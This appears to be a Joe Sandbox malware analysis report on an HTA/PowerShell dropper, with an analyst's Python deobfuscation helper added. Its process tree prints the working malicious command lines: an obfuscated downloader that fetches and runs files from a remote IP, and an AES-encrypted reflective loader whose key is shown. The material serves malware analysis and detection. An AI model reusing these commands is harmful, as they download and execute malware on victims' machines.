2024-04-20 14:06:15 UTC | 208 | OUT | GET /rules/rule170012v10s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
2024-04-20 14:06:15 UTC | 564 | IN | HTTP/1.1 200 OK
                                                        Date: Sat, 20 Apr 2024 14:06:15 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1523
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:33 GMT
                                                        ETag: "0x8DC582BD969CD29"
                                                        x-ms-request-id: a666d262-c01e-0047-372b-93d7e7000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20240420T140615Z-16f7b4795d46g992h39k4er964000000012000000000094r
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_MISS
                                                        Accept-Ranges: bytes
2024-04-20 14:06:15 UTC | 1523 | IN | Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 37 30 30 31 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 47 72 61 70 68 69 63 73 2e 47 56 69 7a 49 6e 6b 53 74 72 6f 6b 65 22 20 41 54 54 3d 22 63 66 63 66 64 62 39 31 63 36 38 63 34 33 32 39 62 62 38 62 37 63 62 37 62 61 62 62 33 63 66 37 2d 65 30 38 32 63 32 66 32 2d 65 66 31 64 2d 34 32 37 61 2d 61 63 34 64 2d 62 30 62 37 30 30 61 66 65 37 61 37 2d 37 36 35 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="170012" V="10" DC="SM" EN="Office.Graphics.GVizInkStroke" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" SP="CriticalBusinessImpact" DCa="PSU" xmlns=""> <S> <UTS T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49755 | 13.107.246.41 | 443 | 7500 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2024-04-20 14:06:15 UTC | 206 | OUT | GET /rules/rule63067v4s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
2024-04-20 14:06:15 UTC | 584 | IN | HTTP/1.1 200 OK
                                                        Date: Sat, 20 Apr 2024 14:06:15 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 2871
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:28:05 GMT
                                                        ETag: "0x8DC582BEC5E84E0"
                                                        x-ms-request-id: 8663ad55-801e-006f-547c-911ec5000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20240420T140615Z-15497cdd9fd6xqg2gux9dtkys400000003c00000000081qu
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
2024-04-20 14:06:15 UTC | 2871 | IN | Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 36 33 30 36 37 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 49 64 65 6e 74 69 74 79 2e 53 73 70 69 50 72 6f 6d 70 74 57 69 6e 33 32 22 20 41 54 54 3d 22 35 63 36 35 62 62 63 34 65 64 62 66 34 38 30 64 39 36 33 37 61 63 65 30 34 64 36 32 62 64 39 38 2d 31 32 38 34 34 38 39 33 2d 38 61 62 39 2d 34 64 64 65 2d 62 38 35 30 2d 35 36 31 32 63 62 31 32 65 30 66 32 2d 37 38 32 32 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="63067" V="4" DC="SM" EN="Office.Identity.SspiPromptWin32" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <S>


Target ID: 0
Start time: 16:05:02
Start date: 20/04/2024
Path: C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit): true
Commandline: mshta.exe "C:\Users\user\Desktop\hta.hta"
Imagebase: 0xf70000
File size: 13'312 bytes
MD5 hash: 06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 1
Start time: 16:05:02
Start date: 20/04/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;
Imagebase: 0xab0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 16:05:02
Start date: 20/04/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 16:05:04
Start date: 20/04/2024
Path: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Roaming\jiteon.xlsx"
Imagebase: 0xab0000
File size: 53'161'064 bytes
MD5 hash: 4A871771235598812032C822E6F68F19
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 4
Start time: 16:05:05
Start date: 20/04/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\GoGi.bat" "
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                        Target ID:5
                                                        Start time:16:05:05
                                                        Start date:20/04/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:6
                                                        Start time:16:05:05
                                                        Start date:20/04/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\GoGi.bat"
                                                        Imagebase:0x240000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:7
                                                        Start time:16:05:05
                                                        Start date:20/04/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:8
                                                        Start time:16:05:05
                                                        Start date:20/04/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk 
([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); "
                                                        Imagebase:0x240000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:16:05:05
                                                        Start date:20/04/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Imagebase:0xab0000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:10
                                                        Start time:16:05:07
                                                        Start date:20/04/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                        Imagebase:0xab0000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:11
                                                        Start time:16:05:07
                                                        Start date:20/04/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:15
                                                        Start time:16:06:10
                                                        Start date:20/04/2024
                                                        Path:C:\Windows\splwow64.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\splwow64.exe 12288
                                                        Imagebase:0x7ff72b520000
                                                        File size:163'840 bytes
                                                        MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false
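
Reading the Target ID 8 command line: the batch file sets the console title to its own path, then the PowerShell stage builds a 14-entry method-name table ($gPQY) from strings padded with throw-away junk, calls every .NET member through that table, reads its own .bat back via [Console]::Title, takes lines index 5 and 6, drops their first two characters, base64-decodes them, AES-CBC-decrypts them with the key and IV visible in the script, gunzips the result and runs both blobs as in-memory assemblies via Assembly.Load(...).EntryPoint.Invoke. The script below is an added analyst helper by the editor, not code from the report or from the sample: it resolves the $gPQY table and substitutes the names back into the call sites so the loader reads in clear, and it mirrors the line-carving step on a constructed batch file. The sample batch lines are constructed; the "::" prefix on the payload lines is an assumption made to explain the Substring(2), not something the report shows. AES decryption and gunzip are not reimplemented here.

```python
"""Static helper for the PowerShell stage in the process tree (Target ID 8).

Added example, not part of the Joe Sandbox report or of the sample. It
re-implements only the .Replace('junk', '') string table and the
ElementAt(n).Substring(2) + FromBase64String carving step.
"""
import base64
import re

# Copied from the cmd.exe command line in the process tree (the $gPQY array).
GPQY_ASSIGNMENT = (
    "'CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),"
    "'LoaUtEPdUtEP'.Replace('UtEP', ''),"
    "'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),"
    "'SprHTnlitrHTn'.Replace('rHTn', ''),"
    "'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),"
    "'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),"
    "'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),"
    "'ReanclddLncldinencldsncld'.Replace('ncld', ''),"
    "'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),"
    "'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),"
    "'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),"
    "'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),"
    "'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),"
    "'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '')"
)

# Three call sites from the same command line, kept as they appear in the report.
LOADER_CALLS = (
    "$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');"
    "$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);"
    "[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);"
)

# Constructed stand-in for GoGi.bat: the loader only touches line index 5 and 6.
# The "::" prefix is an assumption (an inert batch comment marker) chosen to
# explain why the script strips two characters before base64-decoding.
SAMPLE_BAT_LINES = [
    "@echo off",
    "rem filler 1",
    "rem filler 2",
    "rem filler 3",
    "rem filler 4",
    "::" + base64.b64encode(b"stage-two-blob").decode(),
    "::" + base64.b64encode(b"stage-one-blob").decode(),
]

# One table element: '<padded text>'.Replace('<junk>', '')
_ELEMENT = re.compile(r"'([^']*)'\.Replace\('([^']*)',\s*''\)")
# One indirect member access: ($gPQY[<n>])
_CALLSITE = re.compile(r"\(\$gPQY\[(\d+)\]\)")


def resolve_table(assignment: str) -> list[str]:
    """Evaluate each .Replace(junk, '') element in array order."""
    return [padded.replace(junk, "") for padded, junk in _ELEMENT.findall(assignment)]


def deobfuscate(script: str, table: list[str]) -> str:
    """Replace every ($gPQY[n]) with its resolved name; unknown indexes stay as-is."""
    def _sub(m: re.Match) -> str:
        idx = int(m.group(1))
        return table[idx] if idx < len(table) else m.group(0)
    return _CALLSITE.sub(_sub, script)


def carve_stages(batch_lines: list[str]) -> tuple[bytes, bytes]:
    """Mirror ElementAt($WrkBk, 5|6).Substring(2) + FromBase64String.

    Returns the two blobs in the order the loader runs them (index 6, then
    index 5). They are still AES-CBC encrypted and gzip-compressed at this point.
    """
    first = base64.b64decode(batch_lines[6][2:])
    second = base64.b64decode(batch_lines[5][2:])
    return first, second


if __name__ == "__main__":
    names = resolve_table(GPQY_ASSIGNMENT)
    for i, n in enumerate(names):
        print(f"$gPQY[{i:2}] = {n}")
    print(deobfuscate(LOADER_CALLS, names))
    print([len(b) for b in carve_stages(SAMPLE_BAT_LINES)])
```

With the table resolved, index 6 is FromBase64String, 7 is ReadLines, 11 is ElementAt, 12 is CreateDecryptor, 4 is TransformFinalBlock, 1 is Load, 13 is EntryPoint and 9 is Invoke, which is the whole decrypt-and-reflectively-load chain; the table also carries GetCurrentProcess, MainModule, ChangeExtension and Split that this stage never calls. To finish the job on a real GoGi.bat, feed the carved blobs through AES-CBC with PKCS7 padding using the base64 key and IV from the command line, then gunzip; the first bytes should then be an MZ header if the loader is what it looks like.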

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1783048809.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7e10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,etq$tP^q$tP^q$$^q$$^q$$^q
                                                          • API String ID: 0-3120554246
                                                          • Opcode ID: 291552da7649acf9c132f06f51a6438e7d7f044d890217ce98a2659f3bc7e895
                                                          • Instruction ID: 93929175872f31e6ce826bc4c1e562257bb20608d8f7b09cc9c2bdf431724470
                                                          • Opcode Fuzzy Hash: 291552da7649acf9c132f06f51a6438e7d7f044d890217ce98a2659f3bc7e895
                                                          • Instruction Fuzzy Hash: 729127B0B0120D9FCB18DB688405BAABFE2AFC5314F1495A9E6059F391DB32DC85C7A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1783048809.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7e10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                          • API String ID: 0-3272787073
                                                          • Opcode ID: 5f56d7e565aea6686a4fead309cfa39be0f92d53f21c5044ba73c644390c8a50
                                                          • Instruction ID: 7bf7bc98f4c81fda364416796334c9b3e182f0f4a009b13a639f90c21fe72876
                                                          • Opcode Fuzzy Hash: 5f56d7e565aea6686a4fead309cfa39be0f92d53f21c5044ba73c644390c8a50
                                                          • Instruction Fuzzy Hash: 98C159B0B0530E9FCB149B79D4017AABBE2AFC2214F18D56AD615CF391DB36C885C792
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1783048809.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7e10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tP^q$$^q$$^q
                                                          • API String ID: 0-1983491577
                                                          • Opcode ID: d898b3ed5f0c4cd75be34e55045e2afc148e242f365f6e30fdd2010e7a5c5339
                                                          • Instruction ID: 6f32225e40f4a3a6c80e4781c14e9695274c97faee60041daa323f5ce1d9254a
                                                          • Opcode Fuzzy Hash: d898b3ed5f0c4cd75be34e55045e2afc148e242f365f6e30fdd2010e7a5c5339
                                                          • Instruction Fuzzy Hash: 7C51C2B0B0620DDFCB28CF69C545BA9BBE2AF85214F19D19AD6049F251D732DC84CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1783048809.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7e10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$$^q$$^q
                                                          • API String ID: 0-2291298209
                                                          • Opcode ID: aa75acfd78da056f87dd1a3f6f58b1c336c93f78225b4324ff223d5c6311b524
                                                          • Instruction ID: f407c10f9a207333ed73e8b9d5e97de3944a97dd8c3135bfcc749eba3f938306
                                                          • Opcode Fuzzy Hash: aa75acfd78da056f87dd1a3f6f58b1c336c93f78225b4324ff223d5c6311b524
                                                          • Instruction Fuzzy Hash: 47310AF0A1230EDBCF249E25C4027B977E5AF82258F589125DA059F391EB3ACDC0C762
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (Xcq$LR^q
                                                          • API String ID: 0-2856513941
                                                          • Opcode ID: a2de8d76d0f1cbd3627cc87936ef71e86749a55cfd211fc56ae709dcf5db79cf
                                                          • Instruction ID: 1078fcdb819c078688a10259416e5d5e6003d04e20cc0d5cb808a538cdfe313a
                                                          • Opcode Fuzzy Hash: a2de8d76d0f1cbd3627cc87936ef71e86749a55cfd211fc56ae709dcf5db79cf
                                                          • Instruction Fuzzy Hash: 13525834B00218CFDB24DB68C994BADBBB2AF85300F1581A9D8499B3A5DF74DD85CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (Xcq$LR^q
                                                          • API String ID: 0-2856513941
                                                          • Opcode ID: 539c6b40e9b502fcda70f7722b6ebd237033229e6e36b8132e7f522d56b0b3b1
                                                          • Instruction ID: f039414c8d610de0b8a24052fc177fa181ae63feea8ac068a4b9f0b449db3cd4
                                                          • Opcode Fuzzy Hash: 539c6b40e9b502fcda70f7722b6ebd237033229e6e36b8132e7f522d56b0b3b1
                                                          • Instruction Fuzzy Hash: 5B516934A003188FDB24CB68C854BADBBB2EF89700F1145AAE545AF3A5DB719D42CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1783048809.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7e10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tP^q$tP^q
                                                          • API String ID: 0-309238000
                                                          • Opcode ID: b5de483cc300c8a7109ff4e46ca7206884133470e51bffb90b0f0c7e3c636800
                                                          • Instruction ID: a0d4277d53624fe864de49745157767966140546b9c51bd22860a803e33739c9
                                                          • Opcode Fuzzy Hash: b5de483cc300c8a7109ff4e46ca7206884133470e51bffb90b0f0c7e3c636800
                                                          • Instruction Fuzzy Hash: 715174B1B052559FC7259B68C8206AABFE5AFC9314F18C46ED588CF241CA32C8C5C3A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
